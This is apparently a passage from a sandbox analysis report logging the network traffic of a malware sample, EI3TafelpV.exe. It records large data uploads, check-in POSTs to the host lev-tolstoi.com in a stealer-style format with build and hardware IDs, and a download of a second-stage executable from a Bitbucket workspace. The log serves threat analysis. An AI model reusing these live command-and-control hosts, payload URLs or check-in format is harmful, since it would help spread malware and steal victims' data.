                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: a6 cd e9 ca 59 95 51 07 17 0c e5 30 f2 21 82 a0 0d b9 28 d1 4a b4 60 0d 91 02 8b 62 22 88 67 01 d8 1f fd d6 52 45 64 eb bb 16 ec cf ba c5 85 63 94 a0 f6 63 40 e9 00 8c d8 d3 e4 57 c1 a2 74 bb 5d c6 8b 02 a0 db a8 fe a3 69 c4 c3 e4 a2 4c a4 8a 08 b4 58 20 97 81 15 53 40 44 fe 5a cc 69 fe 6d 00 f5 aa d9 3d bb 4f fc 50 af 55 92 6f c8 da fe b8 38 31 f1 ed 38 ff 22 47 81 b5 4e 75 8f 70 67 8d 47 ca 00 d9 e9 1d 68 16 62 43 3b 63 cf 96 93 93 f4 03 30 3f 65 9e cb da 85 7f 87 6e 4a 46 d9 20 0c 81 58 ef c7 dd dc 8f d2 31 51 78 50 55 08 2c 5c ea 55 c9 a2 7e eb 03 ed 45 b1 a1 78 a1 77 2e dd 9d 3c 1f bc f4 ca f7 5a ef eb 88 4d df b8 ac 89 01 5b 32 f5 f9 79 97 f7 2b 20 ff 30 70 f8 f2 a0 e1 05 ae 58 7b 07 ac b2 77 dc 4b ab 9f 67 1e d9 26 e9 5c af 4d 55 b1 70 03 3f a2 f8
                                                                                                                                                                                                                                                                                      Data Ascii: YQ0!(J`b"gREdcc@Wt]iLX S@DZim=OPUo818"GNupgGhbC;c0?enJF X1QxPU,\U~Exw.<ZM[2y+ 0pX{wKg&\MUp?
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: 9d 0e c6 fc 92 c8 5f 31 a9 92 0c 0b cc 3d 43 48 e2 75 18 95 a8 b6 c9 3c 9d e0 5c 65 8e 70 5d e8 83 37 5e f4 d3 ba 3a b9 31 ae be f4 45 a5 5d 0f 6f 34 4a 89 46 38 ae 2b c6 16 c6 1d 34 43 df 9a 42 8c 89 bb da f5 33 32 62 70 35 da 06 21 6c 9c 6c f4 53 b7 c4 43 c8 97 ce 91 57 85 e8 e0 a5 e7 fa c8 ac 5b cf e1 1c 16 d2 4e e3 69 20 89 17 e8 c9 9d ca 6e 96 7c c4 02 66 a4 af 47 7a d8 16 79 ad 49 92 16 58 65 9f 66 7d 36 95 67 07 3b 16 52 ff c9 54 bb 73 08 c2 f0 20 f9 d0 69 c6 da 03 d9 42 bb f3 03 ee 09 01 bd 8e 20 92 b6 b4 55 7f 70 4c b5 54 12 68 a9 c2 41 d7 fa 48 fe c6 de 96 da df 57 8c 56 12 c9 4b f3 10 cf 3d 40 67 f4 a7 1f 34 a6 7b f1 c1 b6 da aa 67 a7 46 5a 65 cc f7 77 2f fd e0 ac c8 b6 9e a8 52 bc 70 a0 b7 11 ed 0c cc 4c 3c ca 50 a3 f9 cd a2 c1 d1 ad b4 91 b9
                                                                                                                                                                                                                                                                                      Data Ascii: _1=CHu<\ep]7^:1E]o4JF8+4CB32bp5!llSCW[Ni n|fGzyIXef}6g;RTs iB UpLThAHWVK=@g4{gFZew/RpL<P
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: bf 4c d0 80 f9 64 7f 98 37 89 d2 59 3b 7f 56 58 ac 1b 7d 62 7a f5 e8 c2 d5 69 8a 1e 84 10 9d ac b2 15 60 b9 78 d3 c1 e0 39 ad 09 55 8f 58 33 0f ce fb d7 84 57 e2 00 94 33 02 6d b8 8e 6a ad 49 62 d0 dc 4a ad 00 f1 9b 26 86 86 0c 5a ca 24 ab 8a 55 df 39 ee 62 7b 40 31 d9 42 26 d8 31 27 54 56 5b 5f e8 7d 0d de 49 e4 70 4e ea f1 b8 e5 7b 3b 91 35 67 e7 45 f3 cf 1d 64 5c d4 a8 e5 89 8b 75 c6 27 71 44 9e 6e 65 a9 93 6c bd ce 98 e8 71 de 4f 09 91 72 75 4c 84 35 f1 61 06 ba fe 53 f3 06 2e 64 89 7f 4b 55 22 44 82 b5 a1 4e 8c 31 b7 2a 1d fe 4f 17 bb 24 5d 54 79 db 24 c7 26 81 9b 8a 41 67 22 41 8a 07 f0 05 a8 6d 14 5e 4d ee 32 4e 1c fa 06 48 cb a0 d8 41 a2 d1 b6 ea bf 95 2e de 58 40 f5 b4 24 ef b1 33 b9 01 48 98 06 99 62 aa 23 b7 59 20 bb c4 cd b0 a1 3f 60 05 f7 91
                                                                                                                                                                                                                                                                                      Data Ascii: Ld7Y;VX}bzi`x9UX3W3mjIbJ&Z$U9b{@1B&1'TV[_}IpN{;5gEd\u'qDnelqOruL5aS.dKU"DN1*O$]Ty$&Ag"Am^M2NHA.X@$3Hb#Y ?`
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: de 91 7d d1 f7 47 31 8f de c6 55 4d ac 0a 1e 0b bc e8 77 3f ad 0c a1 2d 20 ff c2 d0 b5 2f 62 26 64 78 bc 60 01 61 ba 5f 9f 67 dd cd b9 0f e7 f9 8a de 7f 78 b4 53 e0 f4 b3 b4 62 48 6b c6 2d 9d c7 6a db 85 eb e7 13 64 52 43 54 f5 c6 99 66 76 e2 d2 8c e7 81 61 d1 7c dc bf 15 7d 80 5e 64 88 f4 8e a0 fc 34 5a 52 7a b5 e4 a8 f7 ad cf f9 23 11 b0 22 d5 c0 54 0d d4 65 05 02 fc 25 81 5e df 08 2f 69 3f 1d 38 ae 9f 42 33 ea 2e 36 da 83 ea aa 9c 7b 25 0d 6a f1 ac 07 bc 88 d8 6a fd ef 61 e6 d8 3f 07 13 78 25 b3 e2 74 90 f2 03 68 d6 1b b0 7e 48 f3 72 f5 75 c0 0c 43 23 c0 ca 21 37 ff 67 80 b5 3e 99 cb 68 3b a3 c3 55 c5 0c 5d 1f 5b ec 5a 0b e9 3b ac 64 b1 0b 24 aa f3 5d 1e e5 04 83 75 02 89 97 25 60 92 c4 ca a4 a0 98 b4 cd 73 b7 ab d5 3b f7 57 79 9e 3a ca 37 c4 f8 10 f7
                                                                                                                                                                                                                                                                                      Data Ascii: }G1UMw?- /b&dx`a_gxSbHk-jdRCTfva|}^d4ZRz#"Te%^/i?8B3.6{%jja?x%th~HruC#!7g>h;U][Z;d$]u%`s;Wy:7
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: f0 b6 8b f0 8d 6e ea 19 54 27 82 74 4b ed a2 19 60 e9 c4 67 3f bc 94 6d 23 aa ee 58 ac 76 ef cf 63 b3 57 51 8a f7 54 ef b1 42 31 af 31 33 34 62 d9 6c e5 c6 ab a0 d9 0a 9d b2 31 9d 95 a3 b4 b5 a5 dc d7 8e 9b f3 d6 cd 1a 94 65 a9 6d 08 76 2d 06 f8 65 d8 ad 28 11 c8 42 e8 01 87 c0 62 24 7c 5b 1f 04 dc 58 e4 40 c2 e0 f6 1d 90 d7 d0 56 77 35 e1 52 44 81 df a8 23 1e 50 66 3f 64 86 9d c7 bd 7e c0 c7 0b a8 e0 bf b2 c8 f3 ff 8a 80 d1 cc ec 1d d7 2c 39 d9 1f fc 67 b0 1f 0e ee 7e a2 8b 92 c0 22 10 8f f6 df ac 37 d4 e8 1e 5b f6 e2 9b 25 cd c8 f9 bf ba b0 83 33 36 fa c8 e3 fd 3c 44 ce ba c3 54 06 53 67 ad 84 c1 b2 20 f6 ac 38 50 43 86 f2 22 67 e2 56 bb 04 2f 9a ed 26 f0 14 c7 4b ed f9 27 47 cf 10 9a fe 83 7d 64 a1 76 19 58 16 f2 2c 01 fa 18 58 19 43 e0 a5 78 01 c4 df
                                                                                                                                                                                                                                                                                      Data Ascii: nT'tK`g?m#XvcWQTB1134bl1emv-e(Bb$|[X@Vw5RD#Pf?d~,9g~"7[%36<DTSg 8PC"gV/&K'G}dvX,XCx
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: 68 34 bd 86 3e fd ac 4e 1d ef 4b 0b bc 6f e8 3c 30 05 d5 de d6 f5 de f1 63 5a 83 ba f2 d7 2f 04 b4 02 56 a1 d2 48 97 23 23 8e ba 27 35 50 ab 32 15 f9 70 76 d8 34 43 9b 96 eb 7e dc c8 4d 3b ed b7 d9 bc 7b 06 77 a2 31 5f 89 1a 4a 3b 92 5a da a2 54 52 b4 ad b7 eb e3 5a 43 7c f0 21 46 2f e3 fb a4 45 65 4f 70 ff ec 1d 86 21 5a 75 ee fb 10 e7 88 88 7c 2f e5 c1 86 de 4c 72 aa 8f e6 2e da ce d4 07 0b c4 3b 2b 44 ff ab 0e de 96 c2 3f 8c 02 6d d6 0a 98 05 c6 d4 bb 3e 46 93 27 56 2a 9f 23 b6 19 ad 61 be 51 72 79 31 62 ba 55 69 89 0f 0c 72 f4 91 8f 0a f4 ab c7 7c c8 a3 05 bb 25 59 b3 82 0b 02 e3 df 19 0f 72 2f 23 d2 f9 ee ad 7a ef 66 d3 a1 4b 73 0b 47 d6 da 0d 68 4b 6a 98 7a a3 73 f4 6f e1 0c 8d 3f f4 57 51 3a cf b8 1d bf 17 e6 fc 97 9c 36 ca 05 82 6e 38 85 6f 78 c7
                                                                                                                                                                                                                                                                                      Data Ascii: h4>NKo<0cZ/VH##'5P2pv4C~M;{w1_J;ZTRZC|!F/EeOp!Zu|/Lr.;+D?m>F'V*#aQry1bUir|%Yr/#zfKsGhKjzso?WQ:6n8ox
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: f6 fc ad 9c 87 f4 9b 8c b9 b0 98 9f 48 92 cb 59 88 d1 a4 f7 e9 8d 51 ae 9e 5c 00 22 5a 51 b5 46 b1 6b 0f 28 b9 ef 9a 77 fd 32 08 9c 04 8d c6 8c 3a cd 64 79 5a 15 1a 9e 1e 05 af 96 b7 60 03 77 43 57 30 40 10 92 12 78 75 19 b5 a6 8b 04 ca 54 8d b9 c1 47 ea 1c 55 d6 48 08 2a ec f8 41 d7 b5 b7 c9 68 98 fb 74 73 ae 78 b3 5f 25 77 1c d7 f5 94 16 4d 03 b7 4e 3d ae b2 75 86 a7 55 ea 53 c7 72 62 94 bb c5 3d 7b d4 c4 90 48 66 67 b9 a6 b2 eb e9 05 9f 73 97 9a 09 f2 d4 b7 aa 76 e6 cf db 78 07 2d 53 da df e8 d0 0d 90 2c 17 57 81 c8 5e cd 51 68 9f 68 fe 09 d7 f4 1c 9c d9 be d6 2f 3a 7e 88 8a f6 76 bc b0 df c6 7e 5c 2b 56 6b 8c 77 c5 b8 b7 99 b6 1d 91 7f 88 20 37 b7 7d 6a 44 98 54 25 ba ba 31 e3 67 8b f9 20 6c 27 66 d5 b6 d6 70 a2 8e 38 63 8e 8a 52 c3 64 22 cc 02 80 28
                                                                                                                                                                                                                                                                                      Data Ascii: HYQ\"ZQFk(w2:dyZ`wCW0@xuTGUH*Ahtsx_%wMN=uUSrb={Hfgsvx-S,W^Qhh/:~v~\+Vkw 7}jDT%1g l'fp8cRd"(
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: 56 32 96 fe 8e 9a f8 6e d1 f8 7e 37 22 9f fd 46 a5 2e cd 83 53 fd e8 d4 48 eb f2 9b 8c b9 17 c9 e9 0b 3f 67 ae e4 fc fc ab 19 ac 5b f3 d5 65 a9 d0 6c 56 97 b5 24 f3 42 8e 3a d9 5d b3 ec 24 59 f0 76 2a 62 fd e8 46 5e 2d fb 2a 73 35 5a 80 25 9a 53 57 58 b9 d0 19 31 fb 5d 7f e9 c7 83 f2 eb 31 a1 9d c7 43 db bc 58 a7 de 2f 3f f6 a8 96 73 8d d8 f1 26 f0 5d d4 ed 1c 63 c5 1e df e3 7f 4d ad 33 be 87 e3 07 1e a6 45 7f 4b b2 10 09 3a 26 52 be 1e b5 b3 aa d0 f7 41 95 e9 d7 5f 66 43 82 54 f5 ee 74 cf 98 c8 99 ca 51 e0 1c d8 ef ae 7d 38 9f 9c d4 43 c1 8a d6 9d 73 38 21 11 19 1a cf 95 f8 0d 0d 3f 56 a9 ee 25 e0 4c a6 5a 6b 83 67 ef 1e d3 72 b8 21 71 73 17 36 78 1c 1e 3a fa 7e b6 77 70 6d a4 44 d3 78 b4 dd 0b 5c 9b 49 f9 c6 2c a2 00 d3 89 44 24 ec 6f 1e c0 3e 2a 80 21
                                                                                                                                                                                                                                                                                      Data Ascii: V2n~7"F.SH?g[elV$B:]$Yv*bF^-*s5Z%SWX1]1CX/?s&]cM3EK:&RA_fCTtQ}8Cs8!?V%LZkgr!qs6x:~wpmDx\I,D$o>*!
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:41 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=vu70451jmb3os93u0vdbdlq4ft; expires=Thu, 17 Apr 2025 23:41:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ts4OG07w9igQxmCaRwdL0G4YcXBJDAxvqrj06jndeCsV8Z0LNA94dZmpixwj7VHba0CdsROgl46Fme4ZtlIg7nkUuT9id0MXUspvqSAVEnmVzccwKlEWe6B1AhdMIuR3WRw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6619155eeec466-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1451&rtt_var=571&sent=207&recv=608&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590045&delivery_rate=1872995&cwnd=216&unsent_bytes=0&cid=acc8d2e4c2806156&ts=4457&x=0"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      8192.168.2.949717172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:42 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 88
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:42 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=F9861B26B0FC8F2DAC8923850305D13E
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:43 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:43 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=4v2idbhb20ol2auoc6b6nfs37t; expires=Thu, 17 Apr 2025 23:41:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCaI7mb39tnG9yk7lZkwwytnRT4m5E7Y9NVIUpF9sgXkscoQWtEYoL15g0G60lNZTlMWy9pXw1Fi6oykdfcOk9ScErndumZ9f3Nd1PU5h%2FzRwgYzvY0Qe3Ml138Wai6NvZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6619398850f791-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1499&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=987&delivery_rate=1921052&cwnd=135&unsent_bytes=0&cid=a34dc46f1d618163&ts=1079&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:43 UTC198INData Raw: 63 30 0d 0a 52 71 58 48 43 4b 4f 73 43 52 68 52 76 35 50 78 42 71 35 56 4f 75 7a 68 32 67 69 71 55 33 64 35 48 49 74 4b 63 69 33 65 6c 50 41 64 33 75 56 39 67 5a 59 72 63 43 58 4c 34 34 49 38 38 6e 70 6d 77 34 4f 7a 66 4d 67 6d 46 42 4a 35 2f 32 51 64 58 37 6e 49 33 79 76 63 71 57 33 55 32 32 5a 71 4f 73 7a 6a 6b 47 58 4c 5a 41 6a 66 30 75 73 36 39 6e 77 45 47 6e 4c 76 46 6c 31 4a 73 65 4f 65 4b 73 71 6d 62 4e 44 77 4a 6c 34 2b 7a 66 36 51 63 74 6f 38 56 49 75 69 73 6d 6e 59 4f 67 4d 59 66 75 63 76 58 45 69 6d 38 64 4a 71 68 36 46 38 67 5a 59 35 4e 48 50 61 73 63 73 33 30 77 67 3d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: c0RqXHCKOsCRhRv5PxBq5VOuzh2giqU3d5HItKci3elPAd3uV9gZYrcCXL44I88npmw4OzfMgmFBJ5/2QdX7nI3yvcqW3U22ZqOszjkGXLZAjf0us69nwEGnLvFl1JseOeKsqmbNDwJl4+zf6Qcto8VIuismnYOgMYfucvXEim8dJqh6F8gZY5NHPascs30wg=
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      9192.168.2.949718185.166.143.494437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:45 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: bitbucket.org
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:46 UTC5952INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: AtlassianEdge
                                                                                                                                                                                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP6BZBWWT&Signature=vcA9Db7F%2B0saKRFsfCStCaveVdY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAYaCXVzLWVhc3QtMSJHMEUCIQCR4zjwVAhVqKomy%2BKxyUZYrmdqdKwZ6SsKfAW5d9SKUQIgXce6zK97xEEyq54wcwdZnPDNZDmI%2F5mX%2B12hjDMGLToqsAIIz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDOcy1jWxvqjqCRBcuCqEAniwBDIrFA%2Fv%2FG83B1FHOyiHEnF1y48cIuoA9KW45XELCyvsFTb4VkYSEUH3IdOO4bS5fbCJ5y4s3m%2Fnmg%2BMyS0bfImHj1%2BT96dKNR7zRAO9QA871R%2FzJwYCHOrnUDk2aF6sv%2FuWIGGZ1rElGUbk%2BmdrRqUBL4VypGipLQYbyLB41LkzpLnSx%2BMzhwE9VbCBQS8uQYc7yspfAdwmtAc03Oc6%2Bn0LFfNUu9tkLKdjIk2ZiptDU2BCCQXlWiMfZz%2FvM1JkbN%2B5A55S5idiJJ7lzqXylnunFWOILzTVU9Yt18pj5JITECQeXxTp%2BPxKEPZIpkM%2FxifbjKiAf375QBv%2FgVvnzYGOMNPzo7sGOp0BhvI4L7avQOxHafpF4cjsKb3nbuLVWJp1SetsJe1LVyBEusl0zRvWVAsiamizVwNj5rcNU [TRUNCATED]
                                                                                                                                                                                                                                                                                      Expires: Mon, 23 Dec 2024 05:54:45 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                                      X-Used-Mesh: False
                                                                                                                                                                                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                                                                                                                                                                                      X-Served-By: 1dd0fd8f2d31
                                                                                                                                                                                                                                                                                      X-Version: c9b3998323c0
                                                                                                                                                                                                                                                                                      X-Static-Version: c9b3998323c0
                                                                                                                                                                                                                                                                                      X-Request-Count: 4056
                                                                                                                                                                                                                                                                                      X-Render-Time: 0.04689383506774902
                                                                                                                                                                                                                                                                                      X-B3-Traceid: b52711e11faf4d8b81f0a9b6be97e2b2
                                                                                                                                                                                                                                                                                      X-B3-Spanid: a10b5b5fa3efcf5f
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                                                                                                                                                                                                      X-Usage-Quota-Remaining: 999083.342
                                                                                                                                                                                                                                                                                      X-Usage-Request-Cost: 930.07
                                                                                                                                                                                                                                                                                      X-Usage-User-Time: 0.027902
                                                                                                                                                                                                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                                                                                                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                                                                      Age: 0
                                                                                                                                                                                                                                                                                      X-Cache: MISS
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      Atl-Traceid: b52711e11faf4d8b81f0a9b6be97e2b2
                                                                                                                                                                                                                                                                                      Atl-Request-Id: b52711e1-1faf-4d8b-81f0-a9b6be97e2b2
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                                                                      Server-Timing: atl-edge;dur=157,atl-edge-internal;dur=3,atl-edge-upstream;dur=156,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      10192.168.2.94971952.216.41.2334437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC1360OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP6BZBWWT&Signature=vcA9Db7F%2B0saKRFsfCStCaveVdY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAYaCXVzLWVhc3QtMSJHMEUCIQCR4zjwVAhVqKomy%2BKxyUZYrmdqdKwZ6SsKfAW5d9SKUQIgXce6zK97xEEyq54wcwdZnPDNZDmI%2F5mX%2B12hjDMGLToqsAIIz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDOcy1jWxvqjqCRBcuCqEAniwBDIrFA%2Fv%2FG83B1FHOyiHEnF1y48cIuoA9KW45XELCyvsFTb4VkYSEUH3IdOO4bS5fbCJ5y4s3m%2Fnmg%2BMyS0bfImHj1%2BT96dKNR7zRAO9QA871R%2FzJwYCHOrnUDk2aF6sv%2FuWIGGZ1rElGUbk%2BmdrRqUBL4VypGipLQYbyLB41LkzpLnSx%2BMzhwE9VbCBQS8uQYc7yspfAdwmtAc03Oc6%2Bn0LFfNUu9tkLKdjIk2ZiptDU2BCCQXlWiMfZz%2FvM1JkbN%2B5A55S5idiJJ7lzqXylnunFWOILzTVU9Yt18pj5JITECQeXxTp%2BPxKEPZIpkM%2FxifbjKiAf375QBv%2FgVvnzYGOMNPzo7sGOp0BhvI4L7avQOxHafpF4cjsKb3nbuLVWJp1SetsJe1LVyBEusl0zRvWVAsiamizVwNj5rcNUL5WWRxoEaDu9Vzi5V0D%2F%2FulTomGSbCMYhTjpRq8p [TRUNCATED]
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:48 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      x-amz-id-2: Vt/TwmKYSP++3GUjnvwaBIk5TL8Hrl3ByvXlLPfL10FaUwupMLvGyyB51SJ7N051NXIkfDsDcp8=
                                                                                                                                                                                                                                                                                      x-amz-request-id: TRBEN1Z7EW31CRB4
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:49 GMT
                                                                                                                                                                                                                                                                                      Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                                                                                                                      ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                      x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
